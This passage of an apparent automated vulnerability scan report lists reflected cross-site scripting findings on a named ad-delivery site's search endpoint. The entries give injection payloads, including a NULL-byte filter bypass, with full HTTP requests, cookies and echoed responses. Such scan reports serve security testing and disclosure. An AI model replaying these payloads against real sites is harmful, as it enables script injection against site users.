<script type='text/javascript' src='http://ap.lijit.com///www/delivery/ajs.php?zoneid=51423&username=buddytv&numAds=2 &serp=1&premium=1&engine=other&lijit_kw=xss xss cd fgytr ghjk9aac6'><script>alert(1)</script>a426f58dd95&cb=453849055&loc=http%3A%2F%2Fweb.15c.lijit.com%2Fdelivery%2Fserp%3Fu%3Dbuddytv%26zt%3D51423%26ztb%3D51735%26zs%3D51422%26nt%3D2%2520%26ns%3D8%26engine%3Dother%26ad_hint%3D%26dne%3Dblog_lijit_narrow_a
...[SNIP]...

1.19. http://www.lijit.com/delivery/serp [q parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lijit.com
Path:	/delivery/serp

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c4262"%3balert(1)//8aa39fa8111 was submitted in the q parameter. This input was echoed as c4262";alert(1)//8aa39fa8111 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /delivery/serp?u=buddytv&zt=51423&ztb=51735&zs=51422&nt=2%20&ns=8&engine=other&ad_hint=&dne=blog_lijit_narrow_ad_unit&q=xss%20xss%20cd%20fgytr%20ghjkc4262"%3balert(1)//8aa39fa8111&uri=http://www.lijit.com/users/buddytv HTTP/1.1
Host: www.lijit.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.lijit.com/delivery/serp?u=buddytv&zt=51423&ztb=51735&zs=51422&nt=2%20&ns=8&engine=other&ad_hint=&dne=blog_lijit_narrow_ad_unit&q=xss%20xss%20cd%20fgytr%20ghjk&uri=http://www.lijit.com/users/buddytv
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ljtrtb=eJyrVjJSslIyMbY0NTJxdLVwNnMyMzZxNTAydDN1M7cA0mZmBkYGSrUAtFMI1w%3D%3D; ljt_ts=t=1318814043061828; OABLOCK=787.1318813997_785.1318880280_1258.1318814747_3747.1318880285; tpro=eJyVUstuwyAQ%2FJc9I3cJ%2BBHfc%2BwXtBVCmMRINliYVKoi%2F3sX3Ka9%2Bja7zMzOAg9YYri6yUL%2FgJv1g40ZzTp3sJKCwdX%2BVnW7MdC3whWKn6jHgBNqd9QpITPvzBmIWslzLrBlUKNapvtaSk4eUZtiYvTdQE9sfY1Kz8VFr077gka3LgWENOZYSEozummI1me1D2XYmcGX%2FfN23oS5uKMSmNs5Dapmx8RuUHEs1YmyEXyGkzKPCNNk9yV98GVxIf61sWpIdot6UKsZcywSrS7lDG%2BPgqCHVzs4%2Ff5y8cnGpJ2frU9A2yXaV%2FCu61AgXechfneMz%2FEgXx7k19vH83HozySX7%2F3n9NRKBnMYlAl3UvYNg08bVxfo6YBXCNv2DQQkua8%3D; ljt_csync=rtb_turn%3A1318813997%2Crtb_simplifi%3A1318813997%2Crtb_mmath%3A1318813997%2C1%3A1318813997%2Crtb_media6%3A1318813997; ljt_reader=9a524261efe1e1588396f48f16471b3c; _OACAP[1258]=1; _OASCAP[1258]=1; _OABLOCK[1258]=1318880317; OACAP=785.6_3841.1_787.7_1258.1_3747.1; OASCAP=785.2_3747.1

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 19:43:10 GMT
Server: PWS/8.0.4
X-Px: ms sea-ag1-n7 ( sea-ag1-n11), ms sea-ag1-n11 ( origin>CONN)
Cache-Control: max-age=0
Expires: Mon, 17 Oct 2011 19:43:10 GMT
Age: 3
Content-Length: 15818
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: keep-alive

<html>
<body>
<script src="http://www.lijit.com/___leviathan_a18/res/js/lijitads/adutils.js" type="text/javascript"></script>
<script type="text/javascript">
/**
* This is mini version of LJT_Ad
...[SNIP]...
var hints = ad_hint.split(/\,/);
var date = new Date();
var hint = hints[date.getSeconds() % hints.length];
return encodeURI(hint);
}

return "xss xss cd fgytr ghjkc4262";alert(1)//8aa39fa8111";
}

LijitAdsPublisher = {
   lijit_blocked_domains:new Array(),
   load:function() {
       var lijit_blocked_domains = "";
       if (lijit_blocked_domains.length >
...[SNIP]...

1.20. http://www.lijit.com/delivery/serp [u parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lijit.com
Path:	/delivery/serp

Issue detail

The value of the u request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 19946'><script>alert(1)</script>91e3d7e06d4 was submitted in the u parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /delivery/serp?u=buddytv19946'><script>alert(1)</script>91e3d7e06d4&zt=51423&ztb=51735&zs=51422&nt=2%20&ns=8&engine=other&ad_hint=&dne=blog_lijit_narrow_ad_unit&q=xss%20xss%20cd%20fgytr%20ghjk&uri=http://www.lijit.com/users/buddytv HTTP/1.1
Host: www.lijit.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.lijit.com/search?uri=http%3A%2F%2Fwww.lijit.com%2Fusers%2Fbuddytv&view=contained&trackresize=true&q=xss%20xss%20cd%20fgytr%20ghjk
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ljtrtb=eJyrVjJSslIyMbY0NTJxdLVwNnMyMzZxNTAydDN1M7cA0mZmBkYGSrUAtFMI1w%3D%3D; ljt_ts=t=1318814043061828; OABLOCK=787.1318813997_785.1318880280_1258.1318814747_3747.1318880285; OACAP=785.5_3841.1_787.7_1258.1_3747.1; OASCAP=785.1_3747.1; ljt_reader=9a524261efe1e1588396f48f16471b3c; _OACAP[785]=1; _OASCAP[785]=1; tpro=eJyVUstuwyAQ%2FJc9I3cJ%2BBHfc%2BwXtBVCmMRINliYVKoi%2F3sX3Ka9%2Bja7zMzOAg9YYri6yUL%2FgJv1g40ZzTp3sJKCwdX%2BVnW7MdC3whWKn6jHgBNqd9QpITPvzBmIWslzLrBlUKNapvtaSk4eUZtiYvTdQE9sfY1Kz8VFr077gka3LgWENOZYSEozummI1me1D2XYmcGX%2FfN23oS5uKMSmNs5Dapmx8RuUHEs1YmyEXyGkzKPCNNk9yV98GVxIf61sWpIdot6UKsZcywSrS7lDG%2BPgqCHVzs4%2Ff5y8cnGpJ2frU9A2yXaV%2FCu61AgXechfneMz%2FEgXx7k19vH83HozySX7%2F3n9NRKBnMYlAl3UvYNg08bVxfo6YBXCNv2DQQkua8%3D; ljt_csync=rtb_turn%3A1318813997%2Crtb_simplifi%3A1318813997%2Crtb_mmath%3A1318813997%2C1%3A1318813997%2Crtb_media6%3A1318813997

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 19:41:21 GMT
Server: PWS/8.0.4
X-Px: ms sea-ag1-n10 ( h0-s1007.p1-sea), ms h0-s1007.p1-sea ( origin>CONN)
Cache-Control: max-age=0
Expires: Mon, 17 Oct 2011 19:41:21 GMT
Age: 0
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 15646

<html>
<body>
<script src="http://www.lijit.com/___leviathan_a18/res/js/lijitads/adutils.js" type="text/javascript"></script>
<script type="text/javascript">
/**
* This is mini version of LJT_Ad
...[SNIP]...
<script type='text/javascript' src='http://ap.lijit.com///www/delivery/ajs.php?zoneid=51423&username=buddytv19946'><script>alert(1)</script>91e3d7e06d4&numAds=2 &serp=1&premium=1&engine=other&lijit_kw=xss xss cd fgytr ghjk&cb=1566189888&loc=http%3A%2F%2Fweb.15c.lijit.com%2Fdelivery%2Fserp%3Fu%3Dbuddytv19946%27%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3
...[SNIP]...

1.21. http://www.lijit.com/delivery/serp [u parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lijit.com
Path:	/delivery/serp

Issue detail

The value of the u request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9d863'%3balert(1)//0f716ebacb was submitted in the u parameter. This input was echoed as 9d863';alert(1)//0f716ebacb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /delivery/serp?u=buddytv9d863'%3balert(1)//0f716ebacb&zt=51423&ztb=51735&zs=51422&nt=2%20&ns=8&engine=other&ad_hint=&dne=blog_lijit_narrow_ad_unit&q=xss%20xss%20cd%20fgytr%20ghjk&uri=http://www.lijit.com/users/buddytv HTTP/1.1
Host: www.lijit.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.lijit.com/search?uri=http%3A%2F%2Fwww.lijit.com%2Fusers%2Fbuddytv&view=contained&trackresize=true&q=xss%20xss%20cd%20fgytr%20ghjk
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ljtrtb=eJyrVjJSslIyMbY0NTJxdLVwNnMyMzZxNTAydDN1M7cA0mZmBkYGSrUAtFMI1w%3D%3D; ljt_ts=t=1318814043061828; OABLOCK=787.1318813997_785.1318880280_1258.1318814747_3747.1318880285; OACAP=785.5_3841.1_787.7_1258.1_3747.1; OASCAP=785.1_3747.1; ljt_reader=9a524261efe1e1588396f48f16471b3c; _OACAP[785]=1; _OASCAP[785]=1; tpro=eJyVUstuwyAQ%2FJc9I3cJ%2BBHfc%2BwXtBVCmMRINliYVKoi%2F3sX3Ka9%2Bja7zMzOAg9YYri6yUL%2FgJv1g40ZzTp3sJKCwdX%2BVnW7MdC3whWKn6jHgBNqd9QpITPvzBmIWslzLrBlUKNapvtaSk4eUZtiYvTdQE9sfY1Kz8VFr077gka3LgWENOZYSEozummI1me1D2XYmcGX%2FfN23oS5uKMSmNs5Dapmx8RuUHEs1YmyEXyGkzKPCNNk9yV98GVxIf61sWpIdot6UKsZcywSrS7lDG%2BPgqCHVzs4%2Ff5y8cnGpJ2frU9A2yXaV%2FCu61AgXechfneMz%2FEgXx7k19vH83HozySX7%2F3n9NRKBnMYlAl3UvYNg08bVxfo6YBXCNv2DQQkua8%3D; ljt_csync=rtb_turn%3A1318813997%2Crtb_simplifi%3A1318813997%2Crtb_mmath%3A1318813997%2C1%3A1318813997%2Crtb_media6%3A1318813997

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 19:41:30 GMT
Server: PWS/8.0.4
X-Px: ms sea-ag1-n10 ( origin>CONN)
Cache-Control: max-age=0
Expires: Mon, 17 Oct 2011 19:41:31 GMT
Age: 0
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 15469

<html>
<body>
<script src="http://www.lijit.com/___leviathan_a18/res/js/lijitads/adutils.js" type="text/javascript"></script>
<script type="text/javascript">
/**
* This is mini version of LJT_Ad
...[SNIP]...
<scr' + 'ipt src="' + 'http://ap.lijit.com///www/delivery/ajs.php?zoneid=28664&username=buddytv9d863';alert(1)//0f716ebacb&numAds=2 &serp=1&premium=1&engine=other&lijit_kw=&cb=661173860&loc=http%3A%2F%2Fweb.15c.lijit.com%2Fdelivery%2Fserp%3Fu%3Dbuddytv9d863%27%253balert%281%29%2F%2F0f716ebacb%26zt%3D51423%26ztb%3D51735%26
...[SNIP]...

1.22. http://www.lijit.com/delivery/serp [zt parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lijit.com
Path:	/delivery/serp

Issue detail

The value of the zt request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 28e8e%3balert(1)//9cdfd4da7d2 was submitted in the zt parameter. This input was echoed as 28e8e;alert(1)//9cdfd4da7d2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /delivery/serp?u=buddytv&zt=5142328e8e%3balert(1)//9cdfd4da7d2&ztb=51735&zs=51422&nt=2%20&ns=8&engine=other&ad_hint=&dne=blog_lijit_narrow_ad_unit&q=xss%20xss%20cd%20fgytr%20ghjk&uri=http://www.lijit.com/users/buddytv HTTP/1.1
Host: www.lijit.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.lijit.com/search?uri=http%3A%2F%2Fwww.lijit.com%2Fusers%2Fbuddytv&view=contained&trackresize=true&q=xss%20xss%20cd%20fgytr%20ghjk
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ljtrtb=eJyrVjJSslIyMbY0NTJxdLVwNnMyMzZxNTAydDN1M7cA0mZmBkYGSrUAtFMI1w%3D%3D; ljt_ts=t=1318814043061828; OABLOCK=787.1318813997_785.1318880280_1258.1318814747_3747.1318880285; OACAP=785.5_3841.1_787.7_1258.1_3747.1; OASCAP=785.1_3747.1; ljt_reader=9a524261efe1e1588396f48f16471b3c; _OACAP[785]=1; _OASCAP[785]=1; tpro=eJyVUstuwyAQ%2FJc9I3cJ%2BBHfc%2BwXtBVCmMRINliYVKoi%2F3sX3Ka9%2Bja7zMzOAg9YYri6yUL%2FgJv1g40ZzTp3sJKCwdX%2BVnW7MdC3whWKn6jHgBNqd9QpITPvzBmIWslzLrBlUKNapvtaSk4eUZtiYvTdQE9sfY1Kz8VFr077gka3LgWENOZYSEozummI1me1D2XYmcGX%2FfN23oS5uKMSmNs5Dapmx8RuUHEs1YmyEXyGkzKPCNNk9yV98GVxIf61sWpIdot6UKsZcywSrS7lDG%2BPgqCHVzs4%2Ff5y8cnGpJ2frU9A2yXaV%2FCu61AgXechfneMz%2FEgXx7k19vH83HozySX7%2F3n9NRKBnMYlAl3UvYNg08bVxfo6YBXCNv2DQQkua8%3D; ljt_csync=rtb_turn%3A1318813997%2Crtb_simplifi%3A1318813997%2Crtb_mmath%3A1318813997%2C1%3A1318813997%2Crtb_media6%3A1318813997

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 19:41:37 GMT
Server: PWS/8.0.4
X-Px: ms sea-ag1-n10 ( sea-ag1-n11), ms sea-ag1-n11 ( origin>CONN)
Cache-Control: max-age=0
Expires: Mon, 17 Oct 2011 19:41:37 GMT
Age: 0
Content-Length: 15402
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: keep-alive

<html>
<body>
<script src="http://www.lijit.com/___leviathan_a18/res/js/lijitads/adutils.js" type="text/javascript"></script>
<script type="text/javascript">
/**
* This is mini version of LJT_Ad
...[SNIP]...
<!--
var canFireSLNoAdsScript = true;
var canFireSkyNoAdsScript = true;
var textAdNoAdsZoneId = 28664;
var skyscraperNoAdsZoneId = 28673;
var skyscraperZoneId = -1;
var textAdZoneId = 5142328e8e;alert(1)//9cdfd4da7d2;
var textAdBottomZoneId = 51735;
var skyCnt=0;

var textAdCnt=2 ;

var zone5142328e8e;alert(1)//9cdfd4da7d2Delivered = false;

var zone51735Delivered = false;

var numSponsoredGoogleAd
...[SNIP]...

1.23. http://www.lijit.com/delivery/serp [zt parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lijit.com
Path:	/delivery/serp

Issue detail

The value of the zt request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %00c11bd'%3balert(1)//55f350b8cb3 was submitted in the zt parameter. This input was echoed as c11bd';alert(1)//55f350b8cb3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /delivery/serp?u=buddytv&zt=51423%00c11bd'%3balert(1)//55f350b8cb3&ztb=51735&zs=51422&nt=2%20&ns=8&engine=other&ad_hint=&dne=blog_lijit_narrow_ad_unit&q=xss%20xss%20cd%20fgytr%20ghjk&uri=http://www.lijit.com/users/buddytv HTTP/1.1
Host: www.lijit.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.lijit.com/search?uri=http%3A%2F%2Fwww.lijit.com%2Fusers%2Fbuddytv&view=contained&trackresize=true&q=xss%20xss%20cd%20fgytr%20ghjk
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ljtrtb=eJyrVjJSslIyMbY0NTJxdLVwNnMyMzZxNTAydDN1M7cA0mZmBkYGSrUAtFMI1w%3D%3D; ljt_ts=t=1318814043061828; OABLOCK=787.1318813997_785.1318880280_1258.1318814747_3747.1318880285; OACAP=785.5_3841.1_787.7_1258.1_3747.1; OASCAP=785.1_3747.1; ljt_reader=9a524261efe1e1588396f48f16471b3c; _OACAP[785]=1; _OASCAP[785]=1; tpro=eJyVUstuwyAQ%2FJc9I3cJ%2BBHfc%2BwXtBVCmMRINliYVKoi%2F3sX3Ka9%2Bja7zMzOAg9YYri6yUL%2FgJv1g40ZzTp3sJKCwdX%2BVnW7MdC3whWKn6jHgBNqd9QpITPvzBmIWslzLrBlUKNapvtaSk4eUZtiYvTdQE9sfY1Kz8VFr077gka3LgWENOZYSEozummI1me1D2XYmcGX%2FfN23oS5uKMSmNs5Dapmx8RuUHEs1YmyEXyGkzKPCNNk9yV98GVxIf61sWpIdot6UKsZcywSrS7lDG%2BPgqCHVzs4%2Ff5y8cnGpJ2frU9A2yXaV%2FCu61AgXechfneMz%2FEgXx7k19vH83HozySX7%2F3n9NRKBnMYlAl3UvYNg08bVxfo6YBXCNv2DQQkua8%3D; ljt_csync=rtb_turn%3A1318813997%2Crtb_simplifi%3A1318813997%2Crtb_mmath%3A1318813997%2C1%3A1318813997%2Crtb_media6%3A1318813997

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 19:41:35 GMT
Server: PWS/8.0.4
X-Px: ms sea-ag1-n10 ( h0-s1007.p1-sea), ms h0-s1007.p1-sea ( origin>CONN)
Cache-Control: max-age=0
Expires: Mon, 17 Oct 2011 19:41:36 GMT
Age: 0
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 15438

<html>
<body>
<script src="http://www.lijit.com/___leviathan_a18/res/js/lijitads/adutils.js" type="text/javascript"></script>
<script type="text/javascript">
/**
* This is mini version of LJT_Ad
...[SNIP]...
yscraperNoAdsZoneId = 28673;
var skyscraperZoneId = -1;
var textAdZoneId = 51423c11bd';alert(1)//55f350b8cb3;
var textAdBottomZoneId = 51735;
var skyCnt=0;

var textAdCnt=2 ;

var zone51423c11bd';alert(1)//55f350b8cb3Delivered = false;

var zone51735Delivered = false;

var numSponsoredGoogleAds = 0;
var numSponsoredBottomGoogleAds = 0;
var numSkyGoogleAds = 0;

//deprecated for new zones
var numSponsored
...[SNIP]...

1.24. http://www.lijit.com/delivery/serp [zt parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lijit.com
Path:	/delivery/serp

Issue detail

The value of the zt request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b1670'><script>alert(1)</script>8c21c691314 was submitted in the zt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /delivery/serp?u=buddytv&zt=51423b1670'><script>alert(1)</script>8c21c691314&ztb=51735&zs=51422&nt=2%20&ns=8&engine=other&ad_hint=&dne=blog_lijit_narrow_ad_unit&q=xss%20xss%20cd%20fgytr%20ghjk&uri=http://www.lijit.com/users/buddytv HTTP/1.1
Host: www.lijit.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.lijit.com/search?uri=http%3A%2F%2Fwww.lijit.com%2Fusers%2Fbuddytv&view=contained&trackresize=true&q=xss%20xss%20cd%20fgytr%20ghjk
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ljtrtb=eJyrVjJSslIyMbY0NTJxdLVwNnMyMzZxNTAydDN1M7cA0mZmBkYGSrUAtFMI1w%3D%3D; ljt_ts=t=1318814043061828; OABLOCK=787.1318813997_785.1318880280_1258.1318814747_3747.1318880285; OACAP=785.5_3841.1_787.7_1258.1_3747.1; OASCAP=785.1_3747.1; ljt_reader=9a524261efe1e1588396f48f16471b3c; _OACAP[785]=1; _OASCAP[785]=1; tpro=eJyVUstuwyAQ%2FJc9I3cJ%2BBHfc%2BwXtBVCmMRINliYVKoi%2F3sX3Ka9%2Bja7zMzOAg9YYri6yUL%2FgJv1g40ZzTp3sJKCwdX%2BVnW7MdC3whWKn6jHgBNqd9QpITPvzBmIWslzLrBlUKNapvtaSk4eUZtiYvTdQE9sfY1Kz8VFr077gka3LgWENOZYSEozummI1me1D2XYmcGX%2FfN23oS5uKMSmNs5Dapmx8RuUHEs1YmyEXyGkzKPCNNk9yV98GVxIf61sWpIdot6UKsZcywSrS7lDG%2BPgqCHVzs4%2Ff5y8cnGpJ2frU9A2yXaV%2FCu61AgXechfneMz%2FEgXx7k19vH83HozySX7%2F3n9NRKBnMYlAl3UvYNg08bVxfo6YBXCNv2DQQkua8%3D; ljt_csync=rtb_turn%3A1318813997%2Crtb_simplifi%3A1318813997%2Crtb_mmath%3A1318813997%2C1%3A1318813997%2Crtb_media6%3A1318813997

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 19:41:32 GMT
Server: PWS/8.0.4
X-Px: ms sea-ag1-n10 ( sea-ag1-n11), ms sea-ag1-n11 ( origin>CONN)
Cache-Control: max-age=0
Expires: Mon, 17 Oct 2011 19:41:32 GMT
Age: 0
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 15537

<html>
<body>
<script src="http://www.lijit.com/___leviathan_a18/res/js/lijitads/adutils.js" type="text/javascript"></script>
<script type="text/javascript">
/**
* This is mini version of LJT_Ad
...[SNIP]...
<script type='text/javascript' src='http://ap.lijit.com///www/delivery/ajs.php?zoneid=51423b1670'><script>alert(1)</script>8c21c691314&username=buddytv&numAds=2 &serp=1&premium=1&engine=other&lijit_kw=xss xss cd fgytr ghjk&cb=1410440807&loc=http%3A%2F%2Fweb.15c.lijit.com%2Fdelivery%2Fserp%3Fu%3Dbuddytv%26zt%3D51423b1670%27%3E%3Cscrip
...[SNIP]...

1.25. http://www.lijit.com/delivery/serp [ztb parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lijit.com
Path:	/delivery/serp

Issue detail

The value of the ztb request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2d599'%3balert(1)//6b07e0eccd4 was submitted in the ztb parameter. This input was echoed as 2d599';alert(1)//6b07e0eccd4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /delivery/serp?u=buddytv&zt=51423&ztb=517352d599'%3balert(1)//6b07e0eccd4&zs=51422&nt=2%20&ns=8&engine=other&ad_hint=&dne=blog_lijit_narrow_ad_unit&q=xss%20xss%20cd%20fgytr%20ghjk&uri=http://www.lijit.com/users/buddytv HTTP/1.1
Host: www.lijit.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.lijit.com/search?uri=http%3A%2F%2Fwww.lijit.com%2Fusers%2Fbuddytv&view=contained&trackresize=true&q=xss%20xss%20cd%20fgytr%20ghjk
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ljtrtb=eJyrVjJSslIyMbY0NTJxdLVwNnMyMzZxNTAydDN1M7cA0mZmBkYGSrUAtFMI1w%3D%3D; ljt_ts=t=1318814043061828; OABLOCK=787.1318813997_785.1318880280_1258.1318814747_3747.1318880285; OACAP=785.5_3841.1_787.7_1258.1_3747.1; OASCAP=785.1_3747.1; ljt_reader=9a524261efe1e1588396f48f16471b3c; _OACAP[785]=1; _OASCAP[785]=1; tpro=eJyVUstuwyAQ%2FJc9I3cJ%2BBHfc%2BwXtBVCmMRINliYVKoi%2F3sX3Ka9%2Bja7zMzOAg9YYri6yUL%2FgJv1g40ZzTp3sJKCwdX%2BVnW7MdC3whWKn6jHgBNqd9QpITPvzBmIWslzLrBlUKNapvtaSk4eUZtiYvTdQE9sfY1Kz8VFr077gka3LgWENOZYSEozummI1me1D2XYmcGX%2FfN23oS5uKMSmNs5Dapmx8RuUHEs1YmyEXyGkzKPCNNk9yV98GVxIf61sWpIdot6UKsZcywSrS7lDG%2BPgqCHVzs4%2Ff5y8cnGpJ2frU9A2yXaV%2FCu61AgXechfneMz%2FEgXx7k19vH83HozySX7%2F3n9NRKBnMYlAl3UvYNg08bVxfo6YBXCNv2DQQkua8%3D; ljt_csync=rtb_turn%3A1318813997%2Crtb_simplifi%3A1318813997%2Crtb_mmath%3A1318813997%2C1%3A1318813997%2Crtb_media6%3A1318813997

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 19:41:40 GMT
Server: PWS/8.0.4
X-Px: ms sea-ag1-n10 ( sea-ag1-n1), ms sea-ag1-n1 ( origin>CONN)
Cache-Control: max-age=0
Expires: Mon, 17 Oct 2011 19:41:41 GMT
Age: 3
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 15416

<html>
<body>
<script src="http://www.lijit.com/___leviathan_a18/res/js/lijitads/adutils.js" type="text/javascript"></script>
<script type="text/javascript">
/**
* This is mini version of LJT_Ad
...[SNIP]...
scraperZoneId = -1;
var textAdZoneId = 51423;
var textAdBottomZoneId = 517352d599';alert(1)//6b07e0eccd4;
var skyCnt=0;

var textAdCnt=2 ;

var zone51423Delivered = false;

var zone517352d599';alert(1)//6b07e0eccd4Delivered = false;

var numSponsoredGoogleAds = 0;
var numSponsoredBottomGoogleAds = 0;
var numSkyGoogleAds = 0;

//deprecated for new zones
var numSponsoredLSAds = 0;
var numSkyLSAds = 0;
var
...[SNIP]...

1.26. http://www.lijit.com/delivery/serp [ztb parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lijit.com
Path:	/delivery/serp

Issue detail

The value of the ztb request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 11c05'><script>alert(1)</script>4f6d59e9da6 was submitted in the ztb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /delivery/serp?u=buddytv&zt=51423&ztb=5173511c05'><script>alert(1)</script>4f6d59e9da6&zs=51422&nt=2%20&ns=8&engine=other&ad_hint=&dne=blog_lijit_narrow_ad_unit&q=xss%20xss%20cd%20fgytr%20ghjk&uri=http://www.lijit.com/users/buddytv HTTP/1.1
Host: www.lijit.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.lijit.com/search?uri=http%3A%2F%2Fwww.lijit.com%2Fusers%2Fbuddytv&view=contained&trackresize=true&q=xss%20xss%20cd%20fgytr%20ghjk
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
